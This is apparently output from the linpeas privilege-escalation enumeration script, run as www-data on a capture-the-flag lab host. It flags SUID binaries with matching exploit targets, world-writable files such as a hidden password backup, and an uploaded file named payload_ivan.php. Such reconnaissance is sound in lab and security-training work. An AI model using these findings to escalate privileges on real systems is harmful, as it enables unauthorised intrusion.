	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	ServerName dev.cmess.thm
	DocumentRoot /var/www/dev
	
</VirtualHost>

-rw-r--r-- 1 root root 70999 Jan 14  2020 /etc/php/7.0/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70656 Jan 14  2020 /etc/php/7.0/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70999 Jan 14  2020 /etc/php/7.0/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Sep 30  2013 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Feb  6  2020 /etc/ldap


╔══════════╣ Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some home ssh config file was found
/usr/share/doc/openssh-client/examples/sshd_config
AuthorizedKeysFile	.ssh/authorized_keys
Subsystem	sftp	/usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Feb  6  2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar  4  2019 /etc/pam.d/sshd




╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Feb  6  2020 /usr/share/keyrings
drwxr-xr-x 2 root root 4096 Feb  6  2020 /var/lib/apt/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 12255 Feb 26  2019 /etc/apt/trusted.gpg
-rw-r--r-- 1 root root 12335 May 18  2012 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 0 May 18  2012 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 2253 Nov  5  2017 /usr/share/keyrings/ubuntu-esm-keyring.gpg
-rw-r--r-- 1 root root 1139 Nov  5  2017 /usr/share/keyrings/ubuntu-fips-keyring.gpg
-rw-r--r-- 1 root root 1227 May 18  2012 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2256 Feb 26  2016 /usr/share/popularity-contest/debian-popcon.gpg
-rw-r--r-- 1 root root 12335 Feb 26  2019 /var/lib/apt/keyrings/ubuntu-archive-keyring.gpg


╔══════════╣ Searching docker files (limit 70)
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
-rwxrwxrwx 1 root root 639 Jul 10  2019 /var/www/html/Dockerfile


╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 694 May 18  2016 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)


-rw-r--r-- 1 root root 69 Jan 14  2020 /etc/php/7.0/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jan 14  2020 /usr/share/php7.0-common/common/ftp.ini






╔══════════╣ Analyzing Interesting logs Files (limit 70)

-rw-r--r-- 1 www-data www-data 948 Mar 14 09:41 /var/www/html/log/error.log

╔══════════╣ Analyzing Windows Files (limit 70)

lrwxrwxrwx 1 root root 20 Feb  6  2020 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Feb  6  2020 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Feb  6  2020 /var/lib/dpkg/alternatives/my.cnf

╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Aug 31  2015 /etc/skel/.bashrc
-rw-r--r-- 1 root root 655 May 16  2017 /etc/skel/.profile

                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 11K May  8  2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 40K May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 74K May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K May 16  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 53K May 16  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 49K May 16  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 134K Jul  4  2017 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 10K Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 419K Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42K Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 139K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 31K Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40K May 16  2018 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40K May 16  2017 /bin/su
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27K May 16  2018 /bin/umount  --->  BSD/Linux(08-1996)

╔══════════╣ SGID
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 23K May 16  2017 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 61K May 16  2017 /usr/bin/chage
-rwxr-sr-x 1 root ssh 351K Mar  4  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27K May 16  2018 /usr/bin/wall
-rwxr-sr-x 1 root crontab 36K Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 39K Nov 17  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 35K Apr  9  2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35K Apr  9  2018 /sbin/pam_extrausers_chkpwd

╔══════════╣ Checking misconfigurations of ld.so
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
  /etc/ld.so.conf.d/x86_64-linux-gnu_EGL.conf
/usr/lib/x86_64-linux-gnu/mesa-egl

╔══════════╣ Capabilities
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

Parent Shell capabilities:
0x0000000000000000=

Files with capabilities (limited to 50):
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3310 Apr 12  2016 sbin.dhclient
-rw-r--r-- 1 root root 1793 Jan 21  2020 usr.sbin.mysqld
-rw-r--r-- 1 root root 1527 Jan  5  2016 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1469 Sep  8  2017 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ .sh files in path
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2020-02-06+18:54:07.1196134090 /opt/.password.bak
2020-02-06+18:28:50.0044226230 /var/www/html/assets/.htaccess

╔══════════╣ Unexpected in root
/initrd.img
/vmlinuz

╔══════════╣ Files (scripts) in /etc/profile.d/
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 16
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 89 root root 4096 Feb 13  2020 ..
-rw-r--r--  1 root root  663 May 18  2016 bash_completion.sh
-rw-r--r--  1 root root 1003 Dec 29  2015 cedilla-portuguese.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/dev
/var/www/dev/index.html
/var/www/html
/var/www/html/composer.json
/var/www/html/index.php
/var/www/html/assets
/var/www/html/assets/.htaccess
/var/www/html/assets/gila-logo.png
/var/www/html/tmp
/var/www/html/tmp/.htaccess
/var/www/html/.htaccess
/var/www/html/sites
/var/www/html/sites/README.md
/var/www/html/app.yaml
/var/www/html/LICENSE
/var/www/html/log
/var/www/html/Dockerfile
/var/www/html/lib
/var/www/html/lib/prism
/var/www/html/lib/prism/prism.css
/var/www/html/lib/prism/prism.js
/var/www/html/lib/vue
/var/www/html/lib/vue/vue-editor.css
/var/www/html/lib/vue/vue.min.js
/var/www/html/lib/vue/vue-draggable.min.js
/var/www/html/lib/vue/vue-editor.js
/var/www/html/lib/CodeMirror

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/run/php

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/andre_backup.tar.gz
/var/log/syslog
/var/log/auth.log

logrotate 3.8.7

╔══════════╣ Files inside /home/www-data (limit 20)

╔══════════╣ Files inside others home (limit 20)
/var/www/dev/index.html
/var/www/html/composer.json
/var/www/html/index.php
/var/www/html/assets/.htaccess
/var/www/html/assets/payload_ivan.php
/var/www/html/assets/gila-logo.png
/var/www/html/tmp/.htaccess
/var/www/html/.htaccess
/var/www/html/sites/README.md
/var/www/html/app.yaml
/var/www/html/LICENSE
/var/www/html/log/error.log
/var/www/html/log/load.php
/var/www/html/log/sessions.log
/var/www/html/log/packages2update.json
/var/www/html/log/login.failed.log
/var/www/html/Dockerfile
/var/www/html/lib/prism/prism.css
/var/www/html/lib/prism/prism.js
/var/www/html/lib/vue/vue-editor.css
grep: write error: Broken pipe

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 161 Mar 14 10:08 /tmp/andre_backup.tar.gz
-rw-r--r-- 1 root root 7867 May  6  2015 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 298768 Dec 29  2015 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 10464 Feb  6  2020 /usr/share/info/dir.old
-rw-r--r-- 1 root root 755 Apr  7  2016 /usr/share/help-langpack/en_AU/deja-dup/backup-first.page
-rw-r--r-- 1 root root 974 Apr  7  2016 /usr/share/help-langpack/en_AU/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 2018 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-frequency.page
-rw-r--r-- 1 root root 1291 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-why.page
-rw-r--r-- 1 root root 2392 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-how.page
-rw-r--r-- 1 root root 2500 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-what.page
-rw-r--r-- 1 root root 2295 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-where.page
-rw-r--r-- 1 root root 1720 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-check.page
-rw-r--r-- 1 root root 1422 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-restore.page
-rw-r--r-- 1 root root 3073 Jun 21  2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-thinkabout.page
-rw-r--r-- 1 root root 2543 Jun 24  2016 /usr/share/help-langpack/en_GB/evolution/backup-restore.page
-rw-r--r-- 1 root root 755 Apr  7  2016 /usr/share/help-langpack/en_GB/deja-dup/backup-first.page
-rw-r--r-- 1 root root 974 Apr  7  2016 /usr/share/help-langpack/en_GB/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 2020 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-frequency.page
-rw-r--r-- 1 root root 1291 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-why.page
-rw-r--r-- 1 root root 2371 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-how.page
-rw-r--r-- 1 root root 2503 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-what.page
-rw-r--r-- 1 root root 2289 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-where.page
-rw-r--r-- 1 root root 1720 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-check.page
-rw-r--r-- 1 root root 1420 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-restore.page
-rw-r--r-- 1 root root 3067 Jun 21  2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-thinkabout.page
-rw-r--r-- 1 root root 2034 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-frequency.page
-rw-r--r-- 1 root root 1298 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-why.page
-rw-r--r-- 1 root root 2418 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-how.page
-rw-r--r-- 1 root root 2530 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-what.page
-rw-r--r-- 1 root root 2308 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-where.page
-rw-r--r-- 1 root root 1732 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-check.page
-rw-r--r-- 1 root root 1427 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-restore.page
-rw-r--r-- 1 root root 3094 Jun 21  2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-thinkabout.page
-rw-r--r-- 1 root root 35792 May  8  2018 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 190591 Jan 16  2019 /usr/src/linux-headers-4.4.0-142-generic/.config.old
-rw-r--r-- 1 root root 0 Jan 16  2019 /usr/src/linux-headers-4.4.0-142-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jan 16  2019 /usr/src/linux-headers-4.4.0-142-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 3020 Feb  6  2020 /etc/apt/sources.bak
-rw-r--r-- 1 root root 610 Feb  6  2020 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Feb  6  2020 /etc/xml/xml-core.xml.old
-rwxrwxrwx 1 root root 36 Feb  6  2020 /opt/.password.bak
-rwxrwxrwx 1 root root 866 Jul 10  2019 /var/www/html/src/core/views/admin/db_backup.php
-rwxrwxrwx 1 root root 3773 Jul 10  2019 /var/www/html/src/core/classes/db_backup.php
-rw-r--r-- 1 root root 128 Feb  6  2020 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 9038 Jan 16  2019 /lib/modules/4.4.0-142-generic/kernel/drivers/power/wm831x_backup.ko
-rw-r--r-- 1 root root 9070 Jan 16  2019 /lib/modules/4.4.0-142-generic/kernel/drivers/net/team/team_mode_activebackup.ko

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
╔══════════╣ Web files?(output limit)
/var/www/:
total 16K
drwxr-xr-x  4 root root 4.0K Feb  6  2020 .
drwxr-xr-x 12 root root 4.0K Feb  6  2020 ..
drwxr-xr-x  2 root root 4.0K Feb  6  2020 dev
drwxrwxrwx  9 root root 4.0K Feb 13  2020 html

/var/www/dev:
total 12K
drwxr-xr-x 2 root root 4.0K Feb  6  2020 .

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 220 Aug 31  2015 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 1391 Feb  6  2020 /etc/apparmor.d/cache/.features
-rw------- 1 root root 0 Feb 26  2019 /etc/.pwd.lock
-rwxrwxrwx 1 root root 36 Feb  6  2020 /opt/.password.bak
-rw-r--r-- 1 root root 0 Mar 14 09:22 /run/network/.ifstate.lock
-rwxrwxrwx 1 root root 1 Feb  6  2020 /var/www/html/assets/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10  2019 /var/www/html/tmp/.htaccess
-rwxrwxrwx 1 root root 1065 Jul 10  2019 /var/www/html/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10  2019 /var/www/html/lib/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10  2019 /var/www/html/src/.htaccess
-rwxrwxrwx 1 root root 1 Jul 10  2019 /var/www/html/src/core/widgets/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10  2019 /var/www/html/themes/.htaccess

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 161 Mar 14 10:08 /tmp/andre_backup.tar.gz
-rwxrwxrwx 1 www-data www-data 828098 Feb 10 12:38 /tmp/linpeas.sh
-rw-r--r-- 1 root root 16930 Feb  6  2020 /var/backups/apt.extended_states.0

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/opt/.password.bak
/run/lock
/run/lock/apache2
/run/php
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory

/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html
/var/www/html/.htaccess
/var/www/html/Dockerfile
/var/www/html/LICENSE
/var/www/html/app.yaml
/var/www/html/assets
/var/www/html/assets/.htaccess
/var/www/html/assets/payload_ivan.php
/var/www/html/composer.json
/var/www/html/config.default.php
/var/www/html/config.php
/var/www/html/index.php
/var/www/html/lib
/var/www/html/lib/.htaccess
/var/www/html/lib/CodeMirror
/var/www/html/lib/CodeMirror/codemirror.css
/var/www/html/lib/CodeMirror/codemirror.js
/var/www/html/lib/CodeMirror/css.js
/var/www/html/lib/CodeMirror/htmlmixed.js
/var/www/html/lib/CodeMirror/javascript.js
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/lib/bootstrap
/var/www/html/lib/bootstrap/bootstrap.min.css
/var/www/html/lib/bootstrap/bootstrap.min.js
/var/www/html/lib/font-awesome
/var/www/html/lib/font-awesome/css
/var/www/html/lib/font-awesome/css/font-awesome.min.css
/var/www/html/lib/font-awesome/fonts
/var/www/html/lib/font-awesome/fonts/fontawesome-webfont.woff
/var/www/html/lib/font-awesome/fonts/fontawesome-webfont.woff2
/var/www/html/lib/gila.min.css
/var/www/html/lib/gila.min.js
/var/www/html/lib/jquery
/var/www/html/lib/jquery/jquery-3.3.1.min.js
/var/www/html/lib/jquery/jquery-sortable.js
/var/www/html/lib/prism
/var/www/html/lib/prism/prism.css
/var/www/html/lib/prism/prism.js
/var/www/html/lib/select2
/var/www/html/lib/select2/select2.min.css
/var/www/html/lib/select2/select2.min.js
/var/www/html/lib/slick
/var/www/html/lib/slick/fonts
/var/www/html/lib/slick/fonts/slick.eot
/var/www/html/lib/slick/fonts/slick.ttf
/var/www/html/lib/slick/fonts/slick.woff
/var/www/html/lib/slick/slick-theme.css
/var/www/html/lib/slick/slick.css
/var/www/html/lib/slick/slick.min.js
/var/www/html/lib/tinymce
/var/www/html/lib/tinymce/jquery.tinymce.min.js
/var/www/html/lib/tinymce/langs
/var/www/html/lib/tinymce/langs/readme.md
/var/www/html/lib/tinymce/license.txt
/var/www/html/lib/tinymce/plugins
/var/www/html/lib/tinymce/plugins/advlist
/var/www/html/lib/tinymce/plugins/advlist/plugin.min.js
/var/www/html/lib/tinymce/plugins/anchor
/var/www/html/lib/tinymce/plugins/anchor/plugin.min.js
/var/www/html/lib/tinymce/plugins/autolink
/var/www/html/lib/tinymce/plugins/autolink/plugin.min.js
/var/www/html/lib/tinymce/plugins/autoresize
/var/www/html/lib/tinymce/plugins/autoresize/plugin.min.js
/var/www/html/lib/tinymce/plugins/autosave
/var/www/html/lib/tinymce/plugins/autosave/plugin.min.js
/var/www/html/lib/tinymce/plugins/bbcode
/var/www/html/lib/tinymce/plugins/bbcode/plugin.min.js
/var/www/html/lib/tinymce/plugins/charmap
/var/www/html/lib/tinymce/plugins/charmap/plugin.min.js
/var/www/html/lib/tinymce/plugins/code
/var/www/html/lib/tinymce/plugins/code/plugin.min.js
/var/www/html/lib/tinymce/plugins/codesample
/var/www/html/lib/tinymce/plugins/codesample/css
/var/www/html/lib/tinymce/plugins/codesample/css/prism.css
/var/www/html/lib/tinymce/plugins/codesample/plugin.min.js
/var/www/html/lib/tinymce/plugins/colorpicker
/var/www/html/lib/tinymce/plugins/colorpicker/plugin.min.js
/var/www/html/lib/tinymce/plugins/contextmenu
/var/www/html/lib/tinymce/plugins/contextmenu/plugin.min.js
/var/www/html/lib/tinymce/plugins/directionality
/var/www/html/lib/tinymce/plugins/directionality/plugin.min.js
/var/www/html/lib/tinymce/plugins/emoticons
/var/www/html/lib/tinymce/plugins/emoticons/img
/var/www/html/lib/tinymce/plugins/emoticons/plugin.min.js
/var/www/html/lib/tinymce/plugins/fullpage
/var/www/html/lib/tinymce/plugins/fullpage/plugin.min.js
/var/www/html/lib/tinymce/plugins/fullscreen
/var/www/html/lib/tinymce/plugins/fullscreen/plugin.min.js
/var/www/html/lib/tinymce/plugins/help
/var/www/html/lib/tinymce/plugins/help/img
/var/www/html/lib/tinymce/plugins/help/plugin.min.js
/var/www/html/lib/tinymce/plugins/hr
/var/www/html/lib/tinymce/plugins/hr/plugin.min.js
/var/www/html/lib/tinymce/plugins/image
/var/www/html/lib/tinymce/plugins/image/plugin.min.js
/var/www/html/lib/tinymce/plugins/imagetools
/var/www/html/lib/tinymce/plugins/imagetools/plugin.min.js
/var/www/html/lib/tinymce/plugins/importcss
/var/www/html/lib/tinymce/plugins/importcss/plugin.min.js
/var/www/html/lib/tinymce/plugins/insertdatetime
/var/www/html/lib/tinymce/plugins/insertdatetime/plugin.min.js
/var/www/html/lib/tinymce/plugins/legacyoutput
/var/www/html/lib/tinymce/plugins/legacyoutput/plugin.min.js
/var/www/html/lib/tinymce/plugins/link
/var/www/html/lib/tinymce/plugins/link/plugin.min.js
/var/www/html/lib/tinymce/plugins/lists
/var/www/html/lib/tinymce/plugins/lists/plugin.min.js
/var/www/html/lib/tinymce/plugins/media
/var/www/html/lib/tinymce/plugins/media/plugin.min.js
/var/www/html/lib/tinymce/plugins/nonbreaking
/var/www/html/lib/tinymce/plugins/nonbreaking/plugin.min.js
/var/www/html/lib/tinymce/plugins/noneditable
/var/www/html/lib/tinymce/plugins/noneditable/plugin.min.js
/var/www/html/lib/tinymce/plugins/pagebreak
/var/www/html/lib/tinymce/plugins/pagebreak/plugin.min.js
/var/www/html/lib/tinymce/plugins/paste
/var/www/html/lib/tinymce/plugins/paste/plugin.min.js
/var/www/html/lib/tinymce/plugins/preview
/var/www/html/lib/tinymce/plugins/preview/plugin.min.js
/var/www/html/lib/tinymce/plugins/print
/var/www/html/lib/tinymce/plugins/print/plugin.min.js
/var/www/html/lib/tinymce/plugins/save
/var/www/html/lib/tinymce/plugins/save/plugin.min.js
/var/www/html/lib/tinymce/plugins/searchreplace
/var/www/html/lib/tinymce/plugins/searchreplace/plugin.min.js
/var/www/html/lib/tinymce/plugins/spellchecker
/var/www/html/lib/tinymce/plugins/spellchecker/plugin.min.js
/var/www/html/lib/tinymce/plugins/tabfocus
/var/www/html/lib/tinymce/plugins/tabfocus/plugin.min.js
/var/www/html/lib/tinymce/plugins/table
/var/www/html/lib/tinymce/plugins/table/plugin.min.js
/var/www/html/lib/tinymce/plugins/template
/var/www/html/lib/tinymce/plugins/template/plugin.min.js
/var/www/html/lib/tinymce/plugins/textcolor
/var/www/html/lib/tinymce/plugins/textcolor/plugin.min.js
/var/www/html/lib/tinymce/plugins/textpattern
/var/www/html/lib/tinymce/plugins/textpattern/plugin.min.js
/var/www/html/lib/tinymce/plugins/toc
/var/www/html/lib/tinymce/plugins/toc/plugin.min.js
/var/www/html/lib/tinymce/plugins/visualblocks
/var/www/html/lib/tinymce/plugins/visualblocks/css
/var/www/html/lib/tinymce/plugins/visualblocks/css/visualblocks.css
/var/www/html/lib/tinymce/plugins/visualblocks/plugin.min.js
/var/www/html/lib/tinymce/plugins/visualchars
/var/www/html/lib/tinymce/plugins/visualchars/plugin.min.js
/var/www/html/lib/tinymce/plugins/wordcount
/var/www/html/lib/tinymce/plugins/wordcount/plugin.min.js
/var/www/html/lib/tinymce/skins
/var/www/html/lib/tinymce/skins/lightgray
/var/www/html/lib/tinymce/skins/lightgray/content.inline.min.css
/var/www/html/lib/tinymce/skins/lightgray/content.min.css
/var/www/html/lib/tinymce/skins/lightgray/content.mobile.min.css
/var/www/html/lib/tinymce/skins/lightgray/fonts
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-mobile.woff
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-small.eot
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-small.ttf
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-small.woff
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce.eot
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/lib/tinymce/skins/lightgray/img
/var/www/html/lib/tinymce/skins/lightgray/skin.min.css
/var/www/html/lib/tinymce/skins/lightgray/skin.mobile.min.css
/var/www/html/lib/tinymce/themes
/var/www/html/lib/tinymce/themes/modern
/var/www/html/lib/tinymce/themes/modern/theme.min.js
/var/www/html/lib/tinymce/tinymce.min.js
/var/www/html/lib/vue
/var/www/html/lib/vue/vue-draggable.min.js
/var/www/html/lib/vue/vue-editor.css
/var/www/html/lib/vue/vue-editor.js
/var/www/html/lib/vue/vue.min.js
/var/www/html/log
/var/www/html/log/error.log
/var/www/html/log/load.php
/var/www/html/log/login.failed.log
/var/www/html/log/packages2update.json
/var/www/html/log/sessions.log
/var/www/html/robots.txt
/var/www/html/sites
/var/www/html/sites/README.md
/var/www/html/src
/var/www/html/src/.htaccess
/var/www/html/src/Cocur
/var/www/html/src/Cocur/Slugify
/var/www/html/src/Cocur/Slugify/LICENSE
/var/www/html/src/Cocur/Slugify/Resources
/var/www/html/src/Cocur/Slugify/Resources/rules
/var/www/html/src/Cocur/Slugify/Resources/rules/arabic.json
/var/www/html/src/Cocur/Slugify/Resources/rules/austrian.json
/var/www/html/src/Cocur/Slugify/Resources/rules/azerbaijani.json
/var/www/html/src/Cocur/Slugify/Resources/rules/bulgarian.json
/var/www/html/src/Cocur/Slugify/Resources/rules/burmese.json
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/Cocur/Slugify/RuleProvider
/var/www/html/src/Cocur/Slugify/RuleProvider/DefaultRuleProvider.php
/var/www/html/src/Cocur/Slugify/RuleProvider/FileRuleProvider.php
